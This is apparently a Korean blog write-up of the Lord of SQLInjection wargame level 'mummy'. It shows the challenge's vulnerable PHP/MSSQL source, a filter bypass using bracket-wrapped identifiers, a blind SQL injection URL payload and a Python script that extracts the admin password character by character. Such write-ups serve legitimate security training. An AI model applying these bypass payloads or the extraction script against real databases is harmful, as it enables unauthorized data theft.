LOS Lv.44 mummy (풀이 봄)
mummy
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
query : select
<?php
include "./config.php";
login_chk();
$db = mssql_connect("mummy");
if(preg_match('/master|sys|information|;|\(|\//i', $_GET['query'])) exit("No Hack ~_~");
for($i=0;$i<strlen($_GET['query']);$i++) if(ord($_GET['query'][$i]) <= 32) exit("%01~%20 can used as whitespace at mssql");
$query = "select".$_GET['query'];
echo "<hr>query : <strong>{$query}</strong><hr><br>";
$result = sqlsrv_fetch_array(sqlsrv_query($db,$query));
if($result[0]) echo "<h2>Hello anonymous</h2>";
$query = "select pw from prob_mummy where id='admin'";
$result = sqlsrv_fetch_array(sqlsrv_query($db,$query));
if($result['pw'] === $_GET['pw']) solve("mummy");
highlight_file(__FILE__);
?>
Solution
컬럼 부분은 +로 우회가 안되는데, 정보를 못찾아서 결국 풀이 봄.
컬럼 이름을 select[id]from[test]where+id='admin' 이런 식으로 []로 감싸줄 수 있음.
- 비밀번호를 알아내야 해서 Blind sqli를 해야함.
?query=[id]from[prob_mummy]where%2bid='admin'and[pw]like%2b'0__%'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import requests
import string
url='https://los.rubiya.kr/chall/mummy_2e13c2a4483d845ce2d37f7c910f0f83.php'
headers={'Content-Type':'application/x-www-form-urlencoded'}
cookies={'PHPSESSID':'[redacted]'}
check="0123456789"+string.ascii_lowercase
pw=''
for i in range(1,20) :
for j in check :
payload={'query' : "[id]from[prob_mummy]where+id='admin'and[pw]like+'"+pw+j+"%'"}
res=requests.get(url, headers=headers, params=payload, cookies=cookies)
if "<h2>Hello anonymous</h2>" in res.text:
pw+=j
print("pw : "+pw) # 0c3cc245
break
print("MUMMY Clear!")
This post is licensed under CC BY 4.0 by the author.